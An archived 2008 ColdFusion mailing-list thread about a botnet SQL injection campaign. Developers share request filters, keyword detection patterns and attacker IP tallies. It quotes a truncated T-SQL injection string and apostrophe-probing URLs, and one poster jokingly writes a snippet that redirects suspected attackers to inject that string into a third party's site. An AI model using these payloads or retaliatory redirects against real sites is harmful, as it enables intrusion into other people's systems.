SQL injection attack on House of Fusion

Sorry for the problems with the House of Fusion site. We've been under massive attack by sql injection bots and I've just been able to get a handle on it. A fast solution to the problem is this: <cfif findnocase("';DECLARE", cgi.query_string)><cfabort></cfif> It works unless you have a few hundred attacks at a time. In that case, place a cfmail before the abort and send youself the cgi.remote_addr. Then block it on the webserver level. It works very well. I've blocked a dozen IPs and now the site is back to flying. -- Michael Dinowitz (http://www.linkedin.com/in/mdinowitz) President: House of Fusion (http://www.houseoffusion.com) Publisher: Fusion Authority (http://www.fusionauthority.com) Adobe Community Expert / Advanced Certified ColdFusion Professional

Yeah, I've gotten a couple today.. but fortunately when Ray built BlogCFC. he covered his bases. Scott Stewart ColdFusion Developer Office of Research Information Systems Research & Economic Development University of North Carolina at Chapel Hill Phone:(919)843-2408 Fax: (919)962-3600 Email: sastew01@email.unc.edu Michael Dinowitz wrote: ----- Excess quoted text cut - see Original Post for more -----

Covering the bases with cfqueryparam is one thing, being mobbed is another. Sometimes you have to stop these things before any other code is run. I've put that abort script at the top of all my application.cfcs jst to brute force stop the horde. On Fri, Aug 8, 2008 at 10:31 AM, Scott Stewart <sastew01@email.unc.edu>wrote: ----- Excess quoted text cut - see Original Post for more -----

and your absolutely right, I've gotten two and query params covered it, but it sounds like you're getting hit two pronged. "If the injection doesn't do something, the brute force attack will" I'm almost flattered that someone thought my site was important enough to attack... Scott Stewart ColdFusion Developer Office of Research Information Systems Research & Economic Development University of North Carolina at Chapel Hill Phone:(919)843-2408 Fax: (919)962-3600 Email: sastew01@email.unc.edu Michael Dinowitz wrote: ----- Excess quoted text cut - see Original Post for more -----

> I'm almost flattered that someone thought my site was important enough > to attack... They didn't. The attack is probably driving itself based on a Google search ( [inurl:.cfm] ?) . -- Tom Chiverton **************************************************** This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB.  A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP.  Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged.  If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents.   If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com.

Ouch.... Thanks Tom... :) -- Scott Stewart ColdFusion Developer Office of Research Information Systems Research & Economic Development University of North Carolina at Chapel Hill Phone:(919)843-2408 Fax: (919)962-3600 Email: sastew01@email.unc.edu Tom Chiverton wrote: ----- Excess quoted text cut - see Original Post for more -----

Which explains why House of Fusion is being so heavily hit. We're literally everywhere on Google. Fusion Authority on the other hand has all of its urls masked to .htm so the only one being attacked there is an old .cfm archive. I'm working on a webserver level fix for this which will bypass the need to block based on IPs. I just need a few moments. The attacks are hitting VERY hard. I got 4000 alert emails in the space of 5 minutes before I turned them off again. On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com ----- Excess quoted text cut - see Original Post for more -----

Yep, I turned e-mail notifications off too, leave it on and you can inadvertently turn blocking SQL injection attacks into a self-imposed DoS attack. Fun stuff. On the plus side, it's nice to see CF finally getting the recognition it deserves, even if it is from parasitic bottom-feeding bots created by despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. --- Ben Which explains why House of Fusion is being so heavily hit. We're literally everywhere on Google. Fusion Authority on the other hand has all of its urls masked to .htm so the only one being attacked there is an old .cfm archive. I'm working on a webserver level fix for this which will bypass the need to block based on IPs. I just need a few moments. The attacks are hitting VERY hard. I got 4000 alert emails in the space of 5 minutes before I turned them off again. On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com ----- Excess quoted text cut - see Original Post for more ----- search ----- Excess quoted text cut - see Original Post for more ----- and > Wales under registered number OC307980 whose registered office address is at ----- Excess quoted text cut - see Original Post for more ----- you ----- Excess quoted text cut - see Original Post for more -----

Preach it Brother Ben! ----- Excess quoted text cut - see Original Post for more -----

Geez Ben, tell how you really feel... =] ----- Excess quoted text cut - see Original Post for more ----- -- Alan Rother Adobe Certified Advanced ColdFusion MX 7 Developer Manager, Phoenix Cold Fusion User Group, AZCFUG.org

Ben, I know I speak for all of us when I say this is a side of you we've never seen. The jury's out but I think I like it (ha). -Mark Yep, I turned e-mail notifications off too, leave it on and you can inadvertently turn blocking SQL injection attacks into a self-imposed DoS attack. Fun stuff. On the plus side, it's nice to see CF finally getting the recognition it deserves, even if it is from parasitic bottom-feeding bots created by despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. --- Ben Which explains why House of Fusion is being so heavily hit. We're literally everywhere on Google. Fusion Authority on the other hand has all of its urls masked to .htm so the only one being attacked there is an old .cfm archive. I'm working on a webserver level fix for this which will bypass the need to block based on IPs. I just need a few moments. The attacks are hitting VERY hard. I got 4000 alert emails in the space of 5 minutes before I turned them off again. On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com ----- Excess quoted text cut - see Original Post for more ----- search ----- Excess quoted text cut - see Original Post for more ----- and > Wales under registered number OC307980 whose registered office address > is at > Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB.   > A list of members is available for inspection at the registered > office. Any reference to a partner in relation to Halliwells LLP means > a member of Halliwells LLP.  Regulated by The Solicitors Regulation Authority. > > CONFIDENTIALITY > > This email is intended only for the use of the addressee named above > and may be confidential or legally privileged.  If you are not the > addressee you > must not read it and must not use any information contained in nor > copy it nor inform any person other than Halliwells LLP or the > addressee of its existence or contents.  If you have received this > email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. > > For more information about Halliwells LLP visit www.halliwells.com. > >

Tell us how you really feel Ben.  :) I had to temporarily stop apache on my site long enough to get a stop gap in place.  My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up.  SSH was even unresponsive. I think I'm going to dump all these attempts in a database to analyze.  I curious where the majority of the IPs are coming from.  There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Yep, was curious about that too. I modified Justin's script to not send e-mails, but to write a simple log entry - more an act of curiosity than anything else - I just log the date, time, and client IP address. --- Ben Tell us how you really feel Ben.  :) I had to temporarily stop apache on my site long enough to get a stop gap in place.  My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up.  SSH was even unresponsive. I think I'm going to dump all these attempts in a database to analyze.  I curious where the majority of the IPs are coming from.  There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned. ~Brad ----- Excess quoted text cut - see Original Post for more -----

I think alot of us are doing that now. Do you think it would be helpful in some way for us to all pool that data? Create some central repository for it so we can all make use of it and maybe even get the attention of some of the ISP? ----- Excess quoted text cut - see Original Post for more ----- -- Alan Rother Adobe Certified Advanced ColdFusion MX 7 Developer Manager, Phoenix Cold Fusion User Group, AZCFUG.org

Well....... This has got to be the strongest case for unit testing then... If a component is unit tested, then the first thing is that you will know that this could happen and fix it straight away. The second is that this is why..... ColdFusion should have adopted an approach that used an ORM instead.... With an ORM it reduces the risk, provided the ORM takes these attacks seriously. I have never seen these attacks with hibernate, within GORM and Domain Driven design approaches. I so hope that ColdFusion 9, has 2 things on its release. 1) The engine itself is open sourced. And the extra functionality and support for middle tier API integration is adopted. 2) GORM style approach as in DDD (Domain Driven Design) is taken more seriously. With these 2 additions then SQL injection will be a thing of the past. -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 Yep, was curious about that too. I modified Justin's script to not send e-mails, but to write a simple log entry - more an act of curiosity than anything else - I just log the date, time, and client IP address. --- Ben Tell us how you really feel Ben.  :) I had to temporarily stop apache on my site long enough to get a stop gap in place.  My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up.  SSH was even unresponsive. I think I'm going to dump all these attempts in a database to analyze.  I curious where the majority of the IPs are coming from.  There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Dang, the brutes thought of everything.  I even tried a test to see if the bots would return cookies I attempted to set in order to track them easier. Nope, they don't. ~Brad

very few bots accept cookies.  I've never actually seen one that does,   but I have read it is possible to write one that will. Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine is a tax for doing wrong. A tax is a fine for doing well.

>>very few bots accept cookies.  I've never actually seen one that does, but I have read it is possible to write one that will. ... If you use CF to write the bot, for instance ;-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

>>.... If you use CF to write the bot, for instance ;-) Speaking of such, snagging a cookie with CF is ridiculously easy (of course it is ;) ). cfhttp returns the responseHeader a structure. EX: This: <cfoutput> #cfhttp.responseHeader["Set-Cookie"]# </cfoutput> Returns this: mytestcookie=test;expires=Sun, 01-Aug-2038 21:57:28 GMT;path=/ On Fri, Aug 8, 2008 at 12:47 PM, Claude Schneegans < schneegans@internetique.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Well, at its most basic level, the process of "accepting a cookie" is really nothing more than parsing the response headers you get back from the web server looking for set-cookie: headers, and then returning the same name/value pairs in a cookie: header the next time you send a request to the server.  Sure, there are rules around how it is supposed to work, but it isn't hard to implement. I can see how it would be advantageous to a bot if more and more sites these days required cookies in order to browse to all the pages. ~Brad > very few bots accept cookies.  I've never actually seen one that does, > but I have read it is possible to write one that will. > > > Wil Genovese

Hmmm... Of course it is possible to use cookies.... They chose not too... Why... Because they have no real need to be attached to a session.... Think about it for a minute or two... -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 very few bots accept cookies.  I've never actually seen one that does,   but I have read it is possible to write one that will. Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine is a tax for doing wrong. A tax is a fine for doing well.

Actually, if you read by blog analysis of the zombies: http://www.codersrevolution.com/index.cfm/2008/8/10/My-analysis-of-the-SQL-injection-zombies 7% of the IPs returned a cookie I set. 75% of IPs that sent more than 2 hits returned my cookie. (Hits came in groups of two) I'm fairly convinced this bot used the Internet Explorer on the victims machine to send out the requests.  I can't prove it, but it probably would have been easier for them to code that way. ~Brad ----- Excess quoted text cut - see Original Post for more -----

> I'm fairly convinced this bot used the Internet Explorer on the victims It would make sense to use the same ActiveX control IE uses, yes. -- Tom Chiverton **************************************************** This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB.  A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP.  Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged.  If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents.   If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com.

> Dang, the brutes thought of everything.  I even tried a test to see if the > bots would return cookies I attempted to set in order to track them > easier. > Nope, they don't. Ok, I take that back.  SOME, but not all, of the hack attempts come back to my site with the cookie I sent to them previously. Rather interesting-- I would expect them to all behave the same way.  Perhaps there are different versions of the Trojan out there. Also, the attacks on my server today seem to either be targeting certain SES URLs, or just plain broken. I am getting hits like: /index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS CHAR(4000));EXEC(@S); You can see that the malicious string is NOT being sent in as any particular URL parameter. Furthermore, since the = sign has not been escaped, the string gets broken up such that the variable name is ";DECLARE @S CHAR(4000);SET @S" and the value is the rest of the string.  What the heck are they trying to do?  Has today's attacks actually infected anyone? ~Brad

Brad, That might make sense if the infection is some sort of control that makes use of an underlying request architecture (IE's for example). If that were the case then the request would be exactly as if it came from the users browser... Cookies and all - yes? -mark > Dang, the brutes thought of everything.  I even tried a test to see if > the bots would return cookies I attempted to set in order to track > them easier. > Nope, they don't. Ok, I take that back.  SOME, but not all, of the hack attempts come back to my site with the cookie I sent to them previously. Rather interesting-- I would expect them to all behave the same way.  Perhaps there are different versions of the Trojan out there. Also, the attacks on my server today seem to either be targeting certain SES URLs, or just plain broken. I am getting hits like: /index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS CHAR(4000));EXEC(@S); You can see that the malicious string is NOT being sent in as any particular URL parameter. Furthermore, since the = sign has not been escaped, the string gets broken up such that the variable name is ";DECLARE @S CHAR(4000);SET @S" and the value is the rest of the string.  What the heck are they trying to do?  Has today's attacks actually infected anyone? ~Brad

That makes a bit of sense.  One difference would probably be if the attackers were interested in the web server's response. If not, they could just fire and forget the request and ignore anything that came back--   including set-cookie headers.  I'm just curious why some of the hits return the cookie after multiple successive hits, but others don't.  It may have to do with the order the hits are sent out.  The bot could spider one page, and then send out 15 asynch attack attempts to all the links on that page before moving on. I've love to get my hands on an infected machine, but that would be about impossible without ISPs giving a darn. ~Brad ----- Excess quoted text cut - see Original Post for more -----

blocking the IPs would probably stop the attacks, but analyzing them is going to be useless. They're either using some hacked computer as a proxy, or have some sort of spoofing in place. Unless you're really good at forensics, you'll never find their real origination point. andy Tell us how you really feel Ben.  :) I had to temporarily stop apache on my site long enough to get a stop gap in place.  My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up.  SSH was even unresponsive. I think I'm going to dump all these attempts in a database to analyze.  I curious where the majority of the IPs are coming from.  There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Yeah, I'm well aware of the near impossibility of ever tracking IP address to anything useful, but I'm a person who likes data, for within mounds of useless data can be found trends.  Most of all, I'm just curious.  Also, I'd like to explore the possibility of reporting compromised people to their ISPs.  Some US ISPs do have abuse policies that might cause them to pressure their users to clean themselves.  A number of these attacks could have come from servers for all we know.  Servers are desirable for Trojans due to their fast internet connections and 24/7 uptime. ~Brad > blocking the IPs would probably stop the attacks, but analyzing them is > going to be useless. They're either using some hacked computer as a proxy, > or have some sort of spoofing in place. Unless you're really good at > forensics, you'll never find their real origination point.

----- Excess quoted text cut - see Original Post for more ----- Once we followed around the IP addresses of what appeared to be a lone form stuffer.  We began to ban any requests from his IP.  Then 20-30 minutes later he would show up again with a different IP. Investigating his IP addresses showed him "coming" from Chili, Denmark, etc.  So how is anyone going to be able to effectively communicate with these IPs to tell them about the compromised systems on their network?  The problem becomes even more difficult to enforce since IPs don't necessarily want to offend their paying customers. Eric Pierce

>>Then 20-30 minutes later he would show up again with a different IP. How do you know it was the same guy ? May be it was the same bot doing the same thing, but these bots are just like viruses, they spread anywhere. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

----- Excess quoted text cut - see Original Post for more ----- We don't.  It was definitely an automated attack (I.e., bot), but it "felt" like it was controlled by one source/individual as opposed to several sources doing the same attack method because as we blocked each IP address the attack took ~20-30 minutes to begin again (I.e., switch IP address).  And each chunk of attacks were all coming from a solitary IP address (which is why we began blocking them). Errata: Below I meant "IPs" to be "ISPs".   "So how is anyone going to be able to effectively communicate with these IPs to tell them about the compromised systems on their network? The problem becomes even more difficult to enforce since IPs don't necessarily want to offend their paying customers." Eric Pierce

> The problem becomes even more difficult to enforce > since ISPs don't necessarily want to offend their paying customers. It depends on the ISP.  I've seen plenty that didn't mind telling a customer they needed to clean their server or be shut down. The real impossibility I've found is actually getting information about the user of an IP address. (This is probably a good thing).  ISP's generally won't cough anything up without a court order and you usually can't get one of those unless you have a certain dollar figure worth of damages.  I have had ISP's contact their customer's on my behalf to question them about suspicious activity though. ~Brad

<< Also, I'd like to explore the possibility of reporting compromised people to their ISPs. >> Well good luck ;) As I posted earlier, we have been hit by over 200,000 attack attempts over the past 2 days. Here's the analysis from our last 195,264 attack attempts: Our attacks over the past *24 hours* have originated from *12,007* different IP addresses.  Twelve THOUSAND.  That is not a typo.   This is an extremely large botnet, pure and simple.   These IP addresses appaer to be largely random folks who are using browsers with vulnerabilities.   Each client, on average, makes 2-4 attack requests. Here are the origin IPs with the most attacks: | ip              | attacks | tmp1 | tmp2 | +-----------------+-------+----------+----------+ | 203.160.1.40    |  1246 |     NULL |     NULL | | 203.160.1.70    |   596 |     NULL |     NULL | | 61.164.132.230  |   478 |     NULL |     NULL | | 211.72.233.9    |   471 |     NULL |     NULL | | 203.162.3.159   |   462 |     NULL |     NULL | | 211.72.233.8    |   452 |     NULL |     NULL | | 211.72.233.10   |   429 |     NULL |     NULL | | 221.253.217.138 |   319 |     NULL |     NULL | | 210.112.177.244 |   252 |     NULL |     NULL | | 59.15.212.125   |   252 |     NULL |     NULL | | 70.88.218.70    |   240 |     NULL |     NULL | | 67.86.134.184   |   234 |     NULL |     NULL | | 125.107.109.47  |   231 |     NULL |     NULL | | 202.92.190.172  |   225 |     NULL |     NULL | | 59.114.123.73   |   224 |     NULL |     NULL | | 12.215.231.131  |   218 |     NULL |     NULL | | 68.193.151.157  |   200 |     NULL |     NULL | | 98.28.106.213   |   200 |     NULL |     NULL | | 122.118.202.29  |   198 |     NULL |     NULL | | 67.184.18.83    |   196 |     NULL |     NULL | There have been fewer than 5 attacks from each of 4515 different IPs. So for those of you trying to stop this sort of thing by blocking IP addresses, don't bother.   Some of those 203.* and 211.* addresses look suspicious, and perhaps are part of the botnet control, but who knows... I have the complete list of 12,000 IP addresses (and counting at the rate of 500+ new IP addresses each hour) of this botnet available if that's of any use to anyone. Regards --- On Fri, 8/8/08, Brad Wood <brad@bradwood.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Well I guess I'm glad I am not the only one dealing with this.  I implemented <cfif cgi.query_string contains "DECLARE%20">     <cfheader statuscode="500" statustext="Server Error"> </cfif> at the top of /Application.cfm and that stopped it dead in its tracks, but not before spiking my custom logging app and turning my weekly sales response figures to oatmeal.  A little spit and polish fixed that. One client had about a 3-day love affair with these bots before they went away.  They made a mess of his error logs when the non-conforming data hit cfqueryparam but otherwise no noticeable effect. I think if I was still actively in the contract programming scene I would find the person propagating this and... pin a medal on them and shake their hand.  This one attack has caused a whole slew of folks who thought I was a PITA crank over-obsessed with security to call me up, apologize and thank me.  If I was still taking clients I'd have just doubled up my dance card. -- --m@Robertson-- Janitor, The Robertson Team mysecretbase.com

Here are my top 50: Note that the top 1 is in the same subnet as your top 1.     I had 134,993 attempts that I caught.. IP (times) 203.160.1.52 (705) 203.162.3.160 (373) 203.160.1.76 (325) 61.164.132.230 (325) 59.15.212.125 (258) 210.112.177.244 (252) 70.189.143.59 (219) 221.253.217.138 (204) 96.36.10.144 (196) 24.73.176.42 (194) 98.28.106.213 (190) 68.193.151.157 (165) 24.47.218.244 (162) 123.202.60.95 (143) 59.114.123.73 (141) 218.254.31.26 (140) 202.131.225.173 (138) 125.107.109.47 (135) 189.172.137.45 (133) 203.162.3.169 (133) 68.56.228.46 (133) 12.217.163.28 (132) 67.86.134.184 (132) 76.92.189.111 (132) 61.252.80.122 (131) 67.177.74.149 (130) 69.249.95.147 (130) 70.109.78.114 (129) 202.92.190.172 (125) 70.124.124.12 (124) 85.228.247.106 (122) 190.244.220.149 (121) 12.207.124.127 (118) 74.128.74.54 (118) 69.254.237.179 (117) 98.195.181.47 (117) 163.19.104.53 (114) 218.237.7.174 (114) 24.170.242.107 (114) 67.180.14.106 (113) 83.145.205.184 (112) 142.177.47.211 (110) 58.241.23.162 (110) 68.194.247.48 (110) 75.67.214.54 (110) 76.122.137.243 (110) 74.214.55.53 (108) 99.194.179.224 (108) 124.8.50.109 (107) 121.13.155.156 (105) ----- Excess quoted text cut - see Original Post for more -----

Now look at how many of those are from Asia Pacific Network Info Centre .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com Here are my top 50: Note that the top 1 is in the same subnet as your top 1.     I had 134,993 attempts that I caught.. IP (times) 203.160.1.52 (705) 203.162.3.160 (373) 203.160.1.76 (325) 61.164.132.230 (325) 59.15.212.125 (258) 210.112.177.244 (252) 70.189.143.59 (219) 221.253.217.138 (204) 96.36.10.144 (196) 24.73.176.42 (194) 98.28.106.213 (190) 68.193.151.157 (165) 24.47.218.244 (162) 123.202.60.95 (143) 59.114.123.73 (141) 218.254.31.26 (140) 202.131.225.173 (138) 125.107.109.47 (135) 189.172.137.45 (133) 203.162.3.169 (133) 68.56.228.46 (133) 12.217.163.28 (132) 67.86.134.184 (132) 76.92.189.111 (132) 61.252.80.122 (131) 67.177.74.149 (130) 69.249.95.147 (130) 70.109.78.114 (129) 202.92.190.172 (125) 70.124.124.12 (124) 85.228.247.106 (122) 190.244.220.149 (121) 12.207.124.127 (118) 74.128.74.54 (118) 69.254.237.179 (117) 98.195.181.47 (117) 163.19.104.53 (114) 218.237.7.174 (114) 24.170.242.107 (114) 67.180.14.106 (113) 83.145.205.184 (112) 142.177.47.211 (110) 58.241.23.162 (110) 68.194.247.48 (110) 75.67.214.54 (110) 76.122.137.243 (110) 74.214.55.53 (108) 99.194.179.224 (108) 124.8.50.109 (107) 121.13.155.156 (105) ----- Excess quoted text cut - see Original Post for more -----

Bobby, what have you been using to look up the origin of the IPs en masse? I found a site that let's me do a handful at a time, but I don't know how accurate the data it. It is saying the majority of my IPs originated from the US. ~Brad > Now look at how many of those are from Asia Pacific Network Info Centre

I wrote something a long time ago to automate grabbing specified info from http://ws.arin.net/whois/ on an IP... I was bored You can pass the IP in the URL like so: http://ws.arin.net/whois/?queryinput=203.160.1.52 So... parse the content of a cfhttp call to http://ws.arin.net/whois/?queryinput=#ipAddress# to grab what you want from the cfhttp.filecontent Hmmm... if everyone did something like this... it would not only be funny... but probably piss off apnic and make them do something about their portion of this problem (which is most of it) <cfhttp url="http://ws.arin.net/whois/?queryinput=#cgi.remote_addr#" resolveurl="no" /> <cfif findnocase('Asia Pacific', cfhttp.filecontent)>   <cflocation url="http://apnic.com/?;DECLARE @S CHAR(4000);SET @S=CAST( etc... etc..." addtoken="no" /> </cfif> Or if you are nicer than me... <cfif findnocase('Asia Pacific', cfhttp.filecontent) AND findnocase(';DECLARE', cgi.query_string)> Yes... bored again. .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com Bobby, what have you been using to look up the origin of the IPs en masse? I found a site that let's me do a handful at a time, but I don't know how accurate the data it. It is saying the majority of my IPs originated from the US. ~Brad > Now look at how many of those are from Asia Pacific Network Info Centre

I guess i'm missing something, Bobby.   Why does a big share of the problem belong to Apnic? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month ----- Excess quoted text cut - see Original Post for more -----

Because the majority of the IPs I've seen from this one belong to them... as they do more than not in these situations. Start keeping firewall logs in general and checking them. I guarantee you will find APNIC in them. .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com I guess i'm missing something, Bobby.   Why does a big share of the problem belong to Apnic? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month ----- Excess quoted text cut - see Original Post for more ----- from > the cfhttp.filecontent > > > > Hmmm... if everyone did something like this... it would not only be funny... ----- Excess quoted text cut - see Original Post for more -----

I'd tell you to watch what you suggest on a public forum, but heck-- we already know the FBI doesn't care.  :) ~Brad ----- Excess quoted text cut - see Original Post for more -----

Suggesting and getting caught doing are 2 different things. IF writing/posting code were an issue though... then everyone who posted the full script would be worried ;-) If anything in my hypothetical 'if' were an issue though... I'd drag you down with me for helping to spread it in your reply :-o Heh .:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com I'd tell you to watch what you suggest on a public forum, but heck-- we already know the FBI doesn't care.  :) ~Brad ----- Excess quoted text cut - see Original Post for more -----

> Suggesting and getting caught doing are 2 different things. IF > writing/posting code were an issue though... then everyone who posted the > full script would be worried ;-) I hope it's just chicken-little, but it's happening to other countries, so... If we continue down the path we've sorta started, defending against this stuff (by spreading information, and/or using tools) will be just as illegal as actually perpetrating crimes. Just a little off-topic food for thought.  Fight for your right, pump up the volume, etc.. /end public service announcement -- email?  Hmmm... get me my aid!  -- Or better yet, just have the aid do it for me.

I'm using WhosOn, an IIS server monitor.  It does an auto look up on the location of the IP and I can also set it up to record alerts for keywords, such as DECLARE. www.whoson.com Bobby, what have you been using to look up the origin of the IPs en masse? I found a site that let's me do a handful at a time, but I don't know how accurate the data it. It is saying the majority of my IPs originated from the US. ~Brad > Now look at how many of those are from Asia Pacific Network Info Centre

So far I have done a small non-representative sample of IP's and found   them to be from all around the globe.   I have Asia Pacific Network,   RIPE Network Amsterdam, Latin America and Caribbean (LANTIC), Hughs   Network MD USA, Rogers Cable Toronto ON,  and the list goes on and   on.  So go ahead and just block THE WORLD. Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine is a tax for doing wrong. A tax is a fine for doing well. On Aug 8, 2008, at 3:25 PM, Brad Wood wrote: ----- Excess quoted text cut - see Original Post for more -----

> on.  So go ahead and just block THE WORLD. > I don't plan on blocking anyone.  I just wanted to play with the data.  :) ~Brad

blocking the IPs would probably stop the attacks, but analyzing them is going to be useless. They're either using some hacked computer as a proxy, or have some sort of spoofing in place. Unless you're really good at forensics, you'll never find their real origination point. andy Tell us how you really feel Ben.  :) I had to temporarily stop apache on my site long enough to get a stop gap in place.  My database is safe, but I was getting around 90 requests a second and ColdFusion and MySQL were eating up all the server's CPU trying to keep up.  SSH was even unresponsive. I think I'm going to dump all these attempts in a database to analyze.  I curious where the majority of the IPs are coming from.  There has to be a way to squeak in the ear of ISPs loud enough to have them shut down infected users until they are cleaned. ~Brad ----- Excess quoted text cut - see Original Post for more -----

Ben Forta wrote: > ... parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant > socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. > > --- Ben Now please don't hold back your feelings on our account.  Please just tell us how you really feel! P.S.  As Mark said.  This is a cool side of a CF celebrity we just don't get to see.  Cool!

Darn, I blew my cover! ;-) --- Ben Ben Forta wrote: > ... parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant > socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. > > --- Ben Now please don't hold back your feelings on our account.  Please just tell us how you really feel! P.S.  As Mark said.  This is a cool side of a CF celebrity we just don't get to see.  Cool!

Ben Forta said ....> <<<<> On the plus side, it's nice to see CF finally getting the recognition it ----- Excess quoted text cut - see Original Post for more ----- What makes you think they're lawyers, Ben? Mike Kear WIndsor, NSW, Australia CEO  AFP Webworks Pty Ltd http://afpwebworks.com

Mike, That's the funniest comment  I've heard this week... 10 points for Mr.Kear. -mark Ben Forta said ....> <<<<> On the plus side, it's nice to see CF finally getting the recognition it > deserves, even if it is from parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form > repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. ----- Excess quoted text cut - see Original Post for more ----- What makes you think they're lawyers, Ben? Mike Kear WIndsor, NSW, Australia CEO  AFP Webworks Pty Ltd http://afpwebworks.com

Hysterical!! Ben Forta said ....> <<<<> On the plus side, it's nice to see CF finally getting the recognition it > deserves, even if it is from parasitic bottom-feeding bots created by > despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form > repugnant socially-inept basement-dwelling death-penalty-deserving hacker-wannabes. ----- Excess quoted text cut - see Original Post for more ----- What makes you think they're lawyers, Ben? Mike Kear WIndsor, NSW, Australia CEO  AFP Webworks Pty Ltd http://afpwebworks.com

We've also noticed these SQL injection attempts rear their head the last day or so; saw almost the exact same type of attack (I.e., same injection payload) back in April as well. The attack we're seeing is very (MS) SQL Server specific as they're trying to hit some SQL Server system tables and inject some HTML links in any fields that can hold text.   We put in place a simple filter at the tops of our pages to cfabort any requests that contain T-SQL cruft in the URL/FORM vars (I.e., DECLARE, EXEC(, CAST(, etc.). We're also noticing some URL var snooping going on that may or may not be related to the above attacks.  Basically an apostrophe is being tried at the end of known URL vars combinations. For example, we'll see three successive errant query strings come through like this. ?a=1'&b=2&c=3 ?a=1&b=2'&c=3 ?a=1&b=2&c=3' where they're trying the apostrophe at the end of each var trying to escape a potential var being use as an SQL string in the back end. IP address bounces around too much, so it's tough to monitor/ban. Something like fail2ban (www.fail2ban.org) may be useful for those running Unix/Linux servers. Eric Pierce

They might be doing a screen scrape looking for an error message to see if they've hit on a vulnerable parameter.  When/if the find one, they probably log it or attempt to attack it. ~Brad ----- Excess quoted text cut - see Original Post for more -----

